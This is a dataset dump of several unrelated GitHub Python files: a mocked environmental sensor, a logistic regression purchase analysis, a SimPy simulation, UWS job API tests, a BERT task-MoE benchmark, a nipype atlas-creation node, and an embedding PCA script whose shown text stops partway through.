seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
73519498715 | ####################################################################################################################################
# Mocked Environmental Sensor
#
# Used for testing or when not all devices are available in hardware
#
# Create an instance of this class, and specify which of the three parameters you want to simulate
#
# Each is simulated as a sinusoid, separated by 20 degrees.
# The cycle time is specified in seconds
#
# The following two are identical
# sensor = MockedEnvSensor(cycle_time=6, requirements=["temp", "humid", "pres"])
# sensor = MockedEnvSensor(cycle_time=6)
#
# If you only want temperature, with a time period of 60 seconds
# sensor = MockedEnvSensor(cycle_time=60, requirements=["temp"])
#
# To read simulated values as a dictionary of key-value pairs, use the read() API
# vals = sensor.read()
#
# Example output:
# {
# 'time': datetime.datetime(2023, 7, 12, 22, 8, 45, 499411),
# 'temp': 6.433710564175197,
# 'pres': 1009.7842888067954,
# 'humid': 43.01135322187372
# }
#
# The date and time are a datetime object.
#
####################################################################################################################################
import sys
import time
import datetime
import math
from EnvSensorCapability import EnvSensorCapability
# Simulates a device for measuring air temperature, pressure and humidity
class MockedEnvSensor(EnvSensorCapability):
def __init__(self,
temp_min: float = 0.0, temp_max: float = 30.0,
pres_min: float = 900, pres_max: float = 1010,
humid_min: float = 20.0, humid_max: float = 99.0,
cycle_time:int = 60, requirements = ["temp", "pres", "humid"]):
# Initialise parent class
super().__init__(has_temp=True, has_humidity=True, has_pressure=True, requirements=requirements)
#self.set_requirements(requirements)
print("Mocked Sensor")
self.temp_mid = (temp_min + temp_max) * 0.5
self.temp_amplitude = temp_max - self.temp_mid
self.pres_mid = (pres_min + pres_max) * 0.5
self.pres_amplitude = pres_max - self.pres_mid
self.humid_mid = (humid_min + humid_max) * 0.5
self.humid_amplitude = humid_max - self.humid_mid
self.T = cycle_time
self.f = 1.0 / cycle_time
self.start_time = time.perf_counter()
def wave(self, phase=0.0) -> float:
t = time.perf_counter() - self.start_time
return math.sin(2*math.pi*self.f*t + phase)
def read(self):
## Build up the data structure of measurements
now = datetime.datetime.now()
env_params = {
"time" : now
}
# Up to three different waveforms 20 degrees apart
if (self.requirements["temp"]):
t = self.wave(0.0)
env_params["temp"] = (self.temp_mid + self.temp_amplitude * t)
if (self.requirements["pres"]):
p = self.wave(2.09)
env_params["pres"] = (self.pres_mid + self.pres_amplitude * p)
if (self.requirements["humid"]):
h = self.wave(4.18)
env_params["humid"] = (self.humid_mid + self.humid_amplitude * h)
return env_params
# ***************************************************************************
# ********************************** Tests **********************************
# ***************************************************************************
#
# On the desktop, pip install pandas matplotlib
#
def test1():
sen = MockedEnvSensor() # Default requirements will be ALL
cap = sen.capability
print(cap)
vals = sen.read()
print(vals)
time.sleep(1)
vals = sen.read()
print(vals)
def test2():
sen = MockedEnvSensor(cycle_time=6, requirements=["temp", "humid"]) # Limited the required measurements
cap = sen.capability
print(cap)
vals = sen.read()
print(vals)
time.sleep(1)
vals = sen.read()
print(vals)
def test3():
temp_sensor = MockedEnvSensor(cycle_time=6)
readings = []
times = []
print('Simulating... please wait')
for n in range(1,61,1):
readings.append(temp_sensor.read())
times.append(datetime.datetime.now())
time.sleep(0.1)
temp = []
pres = []
humid = []
for n in range(0,60,1):
print(f'{times[n]} : {readings[n]}')
temp.append(readings[n]["temp"])
pres.append(readings[n]["pres"])
humid.append(readings[n]["humid"])
if (sys.implementation.name == "cpython"):
import matplotlib.pyplot as plt
plt.subplot(3,1,1)
plt.plot(times,temp)
plt.xticks(rotation=0, ha='right')
plt.ylabel('Temperature')
plt.title('Mocked Temperature Sensor')
plt.ylim((0,60))
# plt.show()
plt.subplot(3,1,2)
plt.plot(times,pres)
plt.xticks(rotation=0, ha='right')
plt.ylabel('Pressure')
plt.title('Mocked Pressure Sensor')
# plt.ylim((0,60))
# plt.show()
plt.subplot(3,1,3)
plt.plot(times,humid)
plt.xticks(rotation=0, ha='right')
plt.xlabel('Time')
plt.ylabel('Humidity')
plt.title('Mocked Humidity Sensor')
plt.ylim((0,100))
plt.show()
test1()
test2()
test3()
| motley197/brian | uPython/polytunnel/MockedEnvSensor.py | MockedEnvSensor.py | py | 5,418 | python | en | code | 1 | github-code | 50 |
41152371765 | #Задание 1
#Случайная непрерывная величина A имеет равномерное распределение на промежутке (200, 800)
#Найдите ее среднее значение и дисперсию.
# промежуток
a=200
b=800
# Мат ожидание и дисперсия для равномерного распределения
M=(a+b)/2
D=(b-a)**2/12
print(f'Среднее значение: {M}\n\
Дисперсия: {D}') | eterity88/DZ_4_teover | 1.py | 1.py | py | 497 | python | ru | code | 0 | github-code | 50 |
70624133596 | import sys
import os
import SimPy.SimulationTrace as sim
class Car(sim.Process):
def __init__(self, name, cc):
sim.Process.__init__(self, name=name)
self.cc = cc
def go(self):
print("{0} {1} Starting".format(sim.now(), self.name))
yield sim.hold, self, 100.0
print("{0} {1} Arrived".format(sim.now(), self.name))
if __name__ == '__main__':
sim.initialize()
car1 = Car("Car1", 2000)
sim.activate(car1, car1.go(), at=6.0)
car2 = Car("Car2", 1600)
sim.activate(car2, car2.go())
sim.simulate(until=200)
print("Current time is {0}".format(sim.now()))
| kubkon/Phd-python | Simulation/sim1.py | sim1.py | py | 572 | python | en | code | 1 | github-code | 50 |
28051108667 | import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
# importer la data
data=pd.read_csv('Produit_acheter.csv')
print(data.head())
# la colonne User ID ne vas pas nous servir dans ce cas car elle n'a aucune influence
data.drop(['User ID'],axis='columns',inplace=True)
# Transformer la variable Gender avec des valeurs numerique
data.Gender = data.Gender.map({'Male': 1, 'Female': 2})
# affichage d'une projection 3d avec Gender
# fig = plt.figure()
# ax = plt.axes(projection='3d')
# ax.scatter(data.Gender,data.Age,data.EstimatedSalary, c=data.Purchased)
# plt.show()
# Influence du genre sur l'achat
table= pd.crosstab(data.Gender,data.Purchased)
table.div(table.sum(1).astype(float), axis=0).plot(kind='bar', stacked=True)
plt.title('Genre / Achat')
plt.xlabel('Genre')
plt.ylabel('Pourcentage de client')
plt.show()
# Supprimer la colonne Gender
data.drop(['Gender'],axis='columns',inplace=True)
# Influence de l'age sur l'achat
table= pd.crosstab(data.Age,data.Purchased)
table.div(table.sum(1).astype(float), axis=0).plot(kind='bar', stacked=True)
plt.title('Age / Achat')
plt.xlabel('Age')
plt.ylabel('Pourcentage de client')
plt.savefig('Age-Achat')
plt.show()
# Influence du salaire estimé sur le salaire
table= pd.crosstab(data.EstimatedSalary,data.Purchased)
table.div(table.sum(1).astype(float), axis=0).plot(kind='bar', stacked=True)
plt.title('Salaire / Achat')
plt.xlabel('Salaire')
plt.ylabel('Pourcentage de client')
plt.show()
# visualiser le data set
print(data)
# Définir notre variable dépendante y et nos varaibles indépendantes X
X = data.iloc[:, [0, 1]].values
y = data.iloc[:, -1].values
# Visualisation des points
plt.scatter(X[:,0],X[:,1], c=y)
plt.show()
# Diviser le dataset entre le Training set et le Test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Normalisation des données
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Construction du modèle
classifier = LogisticRegression(random_state = 0, solver='liblinear')
classifier.fit(X_train, y_train)
# Faire de nouvelles prédictions
y_pred = classifier.predict(X_test)
print(y_pred)
# Verifie le taux de fiabilité des predictions
classifier.score(X_test,y_test)
print("Moyenne =",classifier.score(X_test,y_test))
# Matrice de confusion
cm = confusion_matrix(y_test, y_pred)
print(cm)
| BENOUSSAIDarezkimalek/python_project | Regression_logistique.py | Regression_logistique.py | py | 2,597 | python | fr | code | 0 | github-code | 50 |
23602634263 | """Tests for the UWS job manipulation handlers.
These tests don't assume any given application, and therefore don't use the
API to create a job, instead inserting it directly via the UWSService.
"""
from __future__ import annotations
from datetime import timedelta
import pytest
from dramatiq import Worker
from fastapi import FastAPI
from httpx import AsyncClient
from vocutouts.uws.config import UWSConfig
from vocutouts.uws.dependencies import UWSFactory
from vocutouts.uws.utils import isodatetime
from ..support.uws import TrivialParameters, uws_broker, wait_for_job
@pytest.mark.asyncio
async def test_job_run(
client: AsyncClient,
uws_config: UWSConfig,
uws_factory: UWSFactory,
) -> None:
job_service = uws_factory.create_job_service()
job = await job_service.create(
"user", run_id="some-run-id", params=TrivialParameters(id="bar")
)
# Check the retrieval of the job configuration.
r = await client.get("/jobs/1", headers={"X-Auth-Request-User": "user"})
assert r.status_code == 200
destruction = job.creation_time + timedelta(hours=24)
assert r.json() == {
"job_id": "1",
"run_id": "some-run-id",
"owner": "user",
"phase": "pending",
"creation_time": isodatetime(job.creation_time),
"execution_duration": 600,
"destruction_time": isodatetime(destruction),
"parameters": {"id": "bar"},
}
# Start the job.
r = await client.post(
"/jobs/1/start",
headers={"X-Auth-Request-User": "user"},
json={"start": True},
follow_redirects=True,
)
assert r.status_code == 200
assert r.url == "https://example.com/jobs/1"
assert r.json() == {
"job_id": "1",
"run_id": "some-run-id",
"owner": "user",
"phase": "queued",
"creation_time": isodatetime(job.creation_time),
"execution_duration": 600,
"destruction_time": isodatetime(destruction),
"parameters": {"id": "bar"},
}
# Start the job worker.
worker = Worker(uws_broker, worker_timeout=100)
worker.start()
# Check the job results.
try:
job = await wait_for_job(job_service, "user", "1")
assert job.start_time
assert job.end_time
assert job.end_time >= job.start_time >= job.creation_time
r = await client.get(
"/jobs/1", headers={"X-Auth-Request-User": "user"}
)
assert r.status_code == 200
assert r.json() == {
"job_id": "1",
"run_id": "some-run-id",
"owner": "user",
"phase": "completed",
"creation_time": isodatetime(job.creation_time),
"start_time": isodatetime(job.start_time),
"end_time": isodatetime(job.end_time),
"execution_duration": 600,
"destruction_time": isodatetime(destruction),
"parameters": {"id": "bar"},
"results": [
{
"result_id": "cutout",
"url": "https://example.com/some/path",
"mime_type": "application/fits",
}
],
}
finally:
worker.stop()
@pytest.mark.asyncio
async def test_job_api(
client: AsyncClient,
uws_factory: UWSFactory,
) -> None:
job_service = uws_factory.create_job_service()
job = await job_service.create("user", params=TrivialParameters(id="bar"))
# Check the retrieval of the job configuration.
destruction = job.creation_time + timedelta(hours=24)
r = await client.get("/jobs/1", headers={"X-Auth-Request-User": "user"})
assert r.status_code == 200
assert r.json() == {
"job_id": "1",
"owner": "user",
"phase": "pending",
"creation_time": isodatetime(job.creation_time),
"execution_duration": 600,
"destruction_time": isodatetime(destruction),
"parameters": {"id": "bar"},
}
# Modify various settings. These go through the policy layer, which is
# mocked to do nothing. Policy rejections will be tested elsewhere.
destruction = job.creation_time + timedelta(hours=48)
r = await client.patch(
"/jobs/1",
headers={"X-Auth-Request-User": "user"},
json={
"destruction_time": isodatetime(destruction),
"execution_duration": 1200,
},
)
assert r.status_code == 200
assert r.json() == {
"job_id": "1",
"owner": "user",
"phase": "pending",
"creation_time": isodatetime(job.creation_time),
"execution_duration": 1200,
"destruction_time": isodatetime(destruction),
"parameters": {"id": "bar"},
}
# Delete the job.
r = await client.delete("/jobs/1", headers={"X-Auth-Request-User": "user"})
assert r.status_code == 204
r = await client.get("/jobs/1", headers={"X-Auth-Request-User": "user"})
assert r.status_code == 404
@pytest.mark.asyncio
async def test_redirects(
app: FastAPI,
uws_factory: UWSFactory,
) -> None:
"""Test the scheme in the redirect URLs.
When running in a Kubernetes cluster behind an ingress that terminates
TLS, the request as seen by the application will be ``http``, but we want
the redirect URLs to honor ``X-Forwarded-Proto`` and thus use ``https``.
We also want to honor the ``Host`` header.
"""
job_service = uws_factory.create_job_service()
await job_service.create("user", params=TrivialParameters(id="bar"))
# Start the job and ensure the resulting redirect is correct.
async with AsyncClient(app=app, base_url="http://foo.com/") as client:
r = await client.post(
"/jobs/1/start",
headers={
"X-Auth-Request-User": "user",
"Host": "example.org",
"X-Forwarded-For": "10.10.10.10",
"X-Forwarded-Proto": "https",
"X-Forwarded-Host": "foo.com",
},
json={"start": True},
)
assert r.status_code == 303
assert r.headers["Location"] == "https://example.org/jobs/1"
| lsst-sqre/ivoa-cutout-poc | tests/uws/job_api_test.py | job_api_test.py | py | 6,151 | python | en | code | 0 | github-code | 50 |
25903350879 | from setuptools import setup
from channelbindjs import VERSION
import os
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='channelbindjs',
version=VERSION,
author='Mathew Oakes',
author_email='like@mathewoak.es',
description=('Activate html document elements for inline editing and '
'live updating from a django-channels backend.'),
url='https://github.com/moaxey/ChannelBindJS',
license='BSD',
long_description=README,
install_requires=[
'Django>=1.8',
'channels>=1.1.6',
],
packages=['channelbindjs'],
package_data={'': ['static/channelbindjs/activate.js']},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet :: WWW/HTTP',
]
)
| moaxey/ChannelBindJS | setup.py | setup.py | py | 1,436 | python | en | code | 1 | github-code | 50 |
11626573921 | import torch
import torch.distributed as dist
import torch.nn as nn
from brt.runtime.benchmark import BenchmarkArgumentManager, ResultWriter
from brt.runtime.placement import dump_decision
from modeling_bert_generation import BertGenerationConfig, BertGenerationDecoder
from transformers import BertGenerationTokenizer
def main():
arg_manager = BenchmarkArgumentManager()
parser = arg_manager.get_parser()
parser.add_argument(
"--mode", type=str, default="debug", choices=["debug", "throughput", "trace"]
)
parser.add_argument(
"--opt", type=str, default="None", choices=["None", "placement", "pytorch"]
)
parser.add_argument("--seq", type=int, choices=[256, 512])
parser.add_argument("--token", type=int, choices=[32, 64])
args = parser.parse_args()
dist.init_process_group(backend="nccl")
local_rank = dist.get_rank()
world_size = dist.get_world_size()
print(f"local_rank: {local_rank}, world_size: {world_size}")
device = torch.device("cuda", local_rank)
torch.cuda.set_device(device)
tokenizer = BertGenerationTokenizer.from_pretrained(
"google/bert_for_seq_generation_L-24_bbc_encoder"
)
config = BertGenerationConfig()
config.is_decoder = True
config.task_moe = True
config.num_tasks = 16
if args.opt == "pytorch":
config.pt_native = True
else:
config.pt_native = False
if args.opt == "placement":
config.placement_aware = True
else:
config.placement_aware = False
model = BertGenerationDecoder(config=config).cuda(device)
inputs_64 = tokenizer(
"To evaluate if the Transformer can generalize to other tasks we performed experiments on English constituency parsing other tasks we performed experiments on English constituency parsing performed experiments on English To evaluate if the Transformer can generalize to other tasks we performed experiments on English constituency parsing other tasks we performed experiments on English constituency parsing performed experiments on English",
return_token_type_ids=False,
return_tensors="pt",
)
inputs_32 = tokenizer(
"To evaluate if the Transformer can generalize to other tasks we performed experiments on English constituency parsing other tasks we performed experiments on English constituency parsing performed experiments on English",
return_token_type_ids=False,
return_tensors="pt",
)
# %%
if args.mode == "debug":
args.seq = 4
# input_ids = inputs["input_ids"].repeat(4, 1).cuda()
if args.token == 32:
input_ids = inputs_32["input_ids"].repeat(args.seq, 1).cuda()
elif args.token == 64:
input_ids = inputs_64["input_ids"].repeat(args.seq, 1).cuda()
print(f"local_rank: {local_rank}, input_ids.shape: {input_ids.shape}")
# %%
model_ddp = nn.parallel.DistributedDataParallel(
model, device_ids=[local_rank], broadcast_buffers=False, bucket_cap_mb=4
)
if args.mode == "debug":
debug(config, model_ddp, input_ids)
elif args.mode == "throughput":
throughput(config, model_ddp, input_ids)
elif args.mode == "trace":
trace(config, model_ddp, model, input_ids)
def debug(config: BertGenerationConfig, model_ddp: nn.Module, input_ids: torch.Tensor):
local_rank = dist.get_rank()
model_ddp.eval()
with torch.inference_mode():
all_task_ids = [
[
1,
0,
3,
2,
],
[
0,
3,
2,
1,
],
]
task_ids = torch.tensor(all_task_ids[local_rank], dtype=torch.int64).cuda()
for i in range(10):
# print(f"local_rank: {local_rank}, input_ids.shape: {input_ids.shape}")
# print(f"local_rank: {local_rank}, task_ids: {task_ids}")
outputs = model_ddp(input_ids, task_ids=task_ids)
prediction_logits = outputs.logits
print(f"logits: {prediction_logits.sum()}")
print(prediction_logits.shape)
def throughput(
config: BertGenerationConfig, model_ddp: nn.Module, input_ids: torch.Tensor
):
bench_iteration = 100
model_ddp.eval()
all_task_ids = []
torch.random.manual_seed(dist.get_rank())
# num_per_task = input_ids.size(0) // config.num_tasks
# task_ids = torch.arange(config.num_tasks, dtype=torch.int64).repeat(num_per_task)
# for _ in range(bench_iteration):
# all_task_ids.append(task_ids[torch.randperm(task_ids.size(0))])
for _ in range(bench_iteration):
all_task_ids.append(torch.randint(0, config.num_tasks, (input_ids.size(0),)))
result_fname = "task_moe/throughput.csv"
result_writer = ResultWriter(result_fname)
with torch.inference_mode():
for i in range(20):
outputs = model_ddp(input_ids, task_ids=all_task_ids[i])
torch.cuda.synchronize()
if dist.get_rank() == 0:
print("warmup done, start benchmark")
start_event = torch.cuda.Event(enable_timing=True)
end_event = torch.cuda.Event(enable_timing=True)
dist.barrier()
start_event.record(torch.cuda.current_stream())
for i in range(bench_iteration):
outputs = model_ddp(input_ids, task_ids=all_task_ids[i])
end_event.record(torch.cuda.current_stream())
end_event.synchronize()
benched_throughput = (
bench_iteration
* input_ids.size(0)
/ start_event.elapsed_time(end_event)
* 1000
)
if config.pt_native:
item = "Torch"
else:
if config.placement_aware:
item = "BRT+P"
else:
item = "BRT"
GPUS = dist.get_world_size()
seq_num = input_ids.size(0)
token_num = input_ids.size(1)
result_writer.write(
f"{item},{GPUS}GPUx{int(16/GPUS)}E,{seq_num}Seqsx{token_num}Tokens,{benched_throughput}"
)
print(
f"local_rank: {dist.get_rank()}, throughput: {benched_throughput} samples/s"
)
def trace(
config: BertGenerationConfig,
model_ddp: nn.Module,
model: nn.Module,
input_ids: torch.Tensor,
):
bench_iteration = 100
model_ddp.eval()
all_task_ids = []
torch.random.manual_seed(dist.get_rank())
for _ in range(bench_iteration):
all_task_ids.append(torch.randint(0, config.num_tasks, (input_ids.size(0),)))
with torch.inference_mode():
for i in range(bench_iteration):
outputs = model_ddp(input_ids, task_ids=all_task_ids[i])
dump_decision(model)
if __name__ == "__main__":
main()
# %%
| Raphael-Hao/brainstorm | benchmark/task_moe/benchmark.py | benchmark.py | py | 6,790 | python | en | code | 26 | github-code | 50 |
26563684006 | from nipype.interfaces.base import BaseInterfaceInputSpec, BaseInterface, File, TraitedSpec, traits
from nipype import Node
from panpipelines.utils.util_functions import *
from panpipelines.utils.transformer import *
import os
import glob
import nibabel as nb
from nipype import logging as nlogging
IFLOGGER=nlogging.getLogger('nipype.interface')
def atlascreate_proc(labels_dict,roi_list,roilabels_list):
cwd=os.getcwd()
labels_dict = updateParams(labels_dict,"CWD",cwd)
output_dir = cwd
participant_label = getParams(labels_dict,'PARTICIPANT_LABEL')
atlas_name = getParams(labels_dict,'ATLAS_NAME')
atlas_workdir = os.path.join(cwd,'{}_workdir'.format(atlas_name))
if not os.path.isdir(atlas_workdir):
os.makedirs(atlas_workdir)
atlas_file = newfile(cwd, atlas_name, prefix=f"sub-{participant_label}", extension="nii.gz")
IFLOGGER.info(f"Creating new atlas {atlas_file}")
special_atlas_type=""
# scan through the roi list and find out if we have a special atlas type
if roi_list[0] == "hcpmmp1aseg":
special_atlas_type="hcpmmp1aseg"
atlas_type = "3D"
atlas_type = getParams(labels_dict,'NEWATLAS_TYPE')
if special_atlas_type == "hcpmmp1aseg":
roilabels_list=create_3d_hcpmmp1_aseg(atlas_file,roi_list,labels_dict)
roi_list = [atlas_file]
elif atlas_type == "3D":
create_3d_atlas_from_rois(atlas_file, roi_list,labels_dict)
elif atlas_type == "3D_contig":
create_3d_atlas_from_rois(atlas_file, roi_list,labels_dict,explode3d=False)
elif atlas_type =="4D":
create_4d_atlas_from_rois(atlas_file, roi_list,labels_dict)
else:
create_3d_atlas_from_rois(atlas_file, roi_list,labels_dict)
atlas_index = newfile(cwd, atlas_name, prefix=f"sub-{participant_label}", extension="txt")
IFLOGGER.info(f"Creating new atlas index {atlas_index}")
with open(atlas_index,"w") as outfile:
for roi_num in range(len(roilabels_list)):
roiname=roilabels_list[roi_num]
if roiname.split(":")[0] == "get_freesurfer_atlas_index":
roi_atlas_file= roi_list[roi_num]
lutfile = substitute_labels(roiname.split(":")[1],labels_dict)
atlas_dict,atlas_index_out=get_freesurferatlas_index(roi_atlas_file,lutfile,None)
outfile.write(atlas_index_out)
else:
outfile.write(roiname + "\n")
out_files=[]
out_files.insert(0,atlas_file)
out_files.insert(0,atlas_index)
return {
"atlas_file":atlas_file,
"atlas_index":atlas_index,
"output_dir":output_dir,
"out_files":out_files
}
class atlascreateInputSpec(BaseInterfaceInputSpec):
labels_dict = traits.Dict({},mandatory=False,desc='labels', usedefault=True)
roi_list = traits.List(desc='list of roi files')
roilabels_list = traits.List(desc='list of labels')
class atlascreateOutputSpec(TraitedSpec):
atlas_file = File(desc='new atlas file')
atlas_index = File(desc='new atlas index file')
output_dir = traits.String(desc="new atlas output directory")
out_files = traits.List(desc='list of files')
class atlascreate_pan(BaseInterface):
input_spec = atlascreateInputSpec
output_spec = atlascreateOutputSpec
def _run_interface(self, runtime):
# Call our python code here:
outputs = atlascreate_proc(
self.inputs.labels_dict,
self.inputs.roi_list,
self.inputs.roilabels_list
)
setattr(self, "_results", outputs)
# And we are done
return runtime
def _list_outputs(self):
return self._results
def create(labels_dict,name="atlascreate_node",roi_list="",roilabels_list="", LOGGER=IFLOGGER):
# Create Node
pan_node = Node(atlascreate_pan(), name=name)
if LOGGER:
LOGGER.info(f"Created Node {pan_node!r}")
# Specify node inputs
pan_node.inputs.labels_dict = labels_dict
pan_node.inputs.roi_list = roi_list
pan_node.inputs.roilabels_list = roilabels_list
return pan_node
| MRIresearch/PANpipelines | src/panpipelines/nodes/atlascreate.py | atlascreate.py | py | 4,107 | python | en | code | 0 | github-code | 50 |
40239391145 | """This file performs PCA on the embeddings and plots the results.
"""
import os
import numpy as np
from sklearn.decomposition import PCA
from sklearn.svm import LinearSVC
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
from tabulate import tabulate
import pandas as pd
from sklearn.feature_selection import VarianceThreshold
def embeddingPCA(embeddings, dim):
"""Performs PCA on the embeddings and plots the results.
Args:
embeddings (list): List of all the embeddings.
dim (int): Dimension of the PCA, either 2 or 3.
"""
# load the embeddings as numpy arrays
load_embeds, labels = [], []
for embedding in embeddings:
embed = np.load(embedding, allow_pickle=True)
if np.shape(embed) != (10, 1024):
continue
labels.append(embedding.split('/')[-2][:3])
load_embeds.append(embed)
# perform PCA
pca = PCA(n_components=10)
nsamples, nx, ny = np.shape(load_embeds)
load_embeds_PCA = np.reshape(load_embeds, (nsamples, nx*ny))
pca.fit(load_embeds_PCA)
# get the new embeddings
load_embeds_PCA = pca.transform(load_embeds_PCA)
# make sure that all labels have the same color for plotting
# make an array with 50 colors for the 50 classes
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w', 'orange', 'purple', 'pink', 'brown', 'grey', 'olive', 'cyan', 'tan', 'lime', 'teal', 'lavender', 'turquoise', 'darkgreen', 'gold', 'darkred', 'darkblue', 'darkorange', 'darkgrey', 'darkviolet', 'darkcyan', 'darkmagenta', 'darkyellow', 'darkkhaki', 'darkolivegreen', 'darkorchid', 'darkseagreen', 'darkslateblue', 'darkslategrey', 'darkturquoise', 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray', 'dodgerblue', 'firebrick', 'forestgreen', 'fuchsia', 'gainsboro', 'gold', 'goldenrod', 'gray', 'greenyellow']
color = []
unique_labels = np.unique(labels)
for label in labels:
label_idx = np.where(unique_labels == label)
color.append(colors[label_idx[0][0]])
# turn labels into integers
labels = [int(label) for label in labels]
plt.figure(figsize=(8,5))
if dim == 2:
# plot the embeddings 2D with label colors for the 50 classes
plt.subplot(1, 2, 1)
plt.title('PCA of the embeddings')
plt.scatter(load_embeds_PCA[:, 0], load_embeds_PCA[:, 1], c=labels)
plt.xlabel('PC1')
plt.ylabel('PC2')
elif dim == 3:
# plot the embeddings 3D with label colors for the 50 classes
#plt.subplot(1, 2, 1)
plt.title('PCA of the embeddings')
ax = plt.axes(projection='3d')
ax.scatter3D(load_embeds_PCA[:, 0], load_embeds_PCA[:, 1], load_embeds_PCA[:, 2], c=labels)
plt.xlabel('PC1')
plt.ylabel('PC2')
plt.show()
exp_var_cumul = np.cumsum(pca.explained_variance_ratio_)
#plot the cumulative explained variance
plt.subplot(1, 2, 2)
plt.title('Cumulative explained variance')
plt.plot(exp_var_cumul)
plt.xticks(np.arange(0, 10, 1))
plt.show()
def whiten(X,fudge=1E-18):
#Attempt to perform PCA whitening on the embeddings.
#Did not work properly and is therefore not used.
# the matrix X should be observations-by-components
# get the covariance matrix
Xcov = np.dot(X.T,X)
# eigenvalue decomposition of the covariance matrix
d, V = np.linalg.eigh(Xcov)
# a fudge factor can be used so that eigenvectors associated with
# small eigenvalues do not get overamplified.
D = np.diag(1. / np.sqrt(d+fudge))
# whitening matrix
W = np.dot(np.dot(V, D), V.T)
# multiply by the whitening matrix
X_white = np.dot(X, W)
return X_white, W
def embeddingPCA_manual(embeddings, dim):
"""Performs PCA on the embeddings without sklearn.
Then plots the results and fits linear classifiers on the embeddings.
Args:
embeddings (list): List of all the embeddings.
dim (int): Dimension of the plot.
"""
load_embeds, labels = [], []
max_embed_len = max(np.unique([len(np.load(embedding)) for embedding in embeddings], return_counts=True)[0])
for embedding in embeddings:
embed = np.load(embedding, allow_pickle=True)
labels.append(embedding.split('/')[-2][:3])
embed = np.reshape(embed, (1024))
load_embeds.append(embed)
# plot the variance of the embeddings
plt.figure(figsize=(8,5))
plt.title('Variance of the embeddings')
plt.hist(np.var(load_embeds, axis=1), color='lightblue', edgecolor='black', bins=20)
# plot a red vertical line at the mean of the variance
plt.axvline(np.mean(np.var(load_embeds, axis=1)), color='r', linestyle='dashed', linewidth=2)
# print the mean of the variance as text besides the red vertical line
plt.text(np.mean(np.var(load_embeds, axis=1)) + 0.0005, 750, r'$\mu$ = {:.5f}'.format(np.mean(np.var(load_embeds, axis=1))))
# give the plot a title and labels
plt.xlabel('Variance')
plt.ylabel('Count')
plt.title('Variance of the embeddings')
plt.savefig('variance_embeds.png')
# initialize figure for plots
fig, axs = plt.subplots(nrows=2, ncols=3, figsize=(12, 8))
figvar, axsvar = plt.subplots(nrows=2, ncols=3, figsize=(12, 8))
scores = pd.DataFrame(columns=['threshold', 'num_features', 'clf', 'clfCV', 'reg', 'bayes', 'svc'])
# threshold ranges from 0.0000 to 0.0025 with a step size of 0.05
thresholds = np.arange(0.0000, 0.0025, 0.0001)
# copy load_embeds
load_embeds_cpy = load_embeds.copy()
#thresholds = [0.00]
for i, threshold in enumerate(thresholds):
print(f'Performing PCA with threshold {threshold}\n')
selector = VarianceThreshold(threshold=threshold)
# reinitialize load_embeds
load_embeds = load_embeds_cpy.copy()
try:
load_embeds = selector.fit_transform(load_embeds)
# perform PCA
# center the data
embed_meaned = load_embeds - np.mean(load_embeds, axis=0)
std = np.std(embed_meaned, axis=0)
# make sure that the standard deviation is not 0 by adding a small value where it is 0
std[std == 0] = 1e-10
# standarisize the data
embed_standardized = embed_meaned / std
# calculate the covariance matrix for the standarized embeddings
cov_mat = np.cov(embed_standardized, rowvar=False)
# calculate the eigenvalues and eigenvectors
eigenvals, eigenvecs = np.linalg.eigh(cov_mat)
# sort the eigenvalues and eigenvectors in descending order
sort_idx = np.argsort(eigenvals)[::-1]
sort_eigenvals = eigenvals[sort_idx]
sort_eigenvecs = eigenvecs[:, sort_idx]
n_components = dim
# transform the data
embed_transformed = np.dot(sort_eigenvecs[:, :n_components].T, embed_standardized.T).T
# turn labels into integers
labels = [int(label) for label in labels]
clfCVscore_super, SVCscore_super, clfCVscore_sub, SVCscore_sub = linear_clf_embeddings_pca(embed_transformed, labels)
# save the scores for each threshold in a dataframe
scores = scores.append({'threshold': round(threshold, 6), 'num_features': load_embeds.shape[1], 'clfCV_super': clfCVscore_super, 'SVC_super': SVCscore_super, 'clfCV_sub': clfCVscore_sub, 'SVC_sub': SVCscore_sub}, ignore_index=True)
# The following code is used to plot the PCA but is commented out for now
# #colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w', 'orange', 'purple', 'pink', 'brown', 'grey', 'olive', 'cyan', 'tan', 'lime', 'teal', 'lavender', 'turquoise', 'darkgreen', 'gold', 'darkred', 'darkblue', 'darkorange', 'darkgrey', 'darkviolet', 'darkcyan', 'darkmagenta', 'darkyellow', 'darkkhaki', 'darkolivegreen', 'darkorchid', 'darkseagreen', 'darkslateblue', 'darkslategrey', 'darkturquoise', 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray', 'dodgerblue', 'firebrick', 'forestgreen', 'fuchsia', 'gainsboro', 'gold', 'goldenrod', 'gray', 'greenyellow']
# colors = ['b', 'g', 'r', 'c', 'm']
# color = []
# parent_labels = np.unique([int(np.unique(label)) // 100 for label in labels])
# unique_labels = np.unique(labels)
# for label in labels:
# # make the labels belong to their parent class, where labels 101-110 belong to class 1, 201-210 to class 2, etc.
# # label = int(unique_labels)
# parent_label = int(label) // 100
# parent_label_idx = np.where(parent_labels == parent_label)
# color.append(colors[parent_label_idx[0][0]])
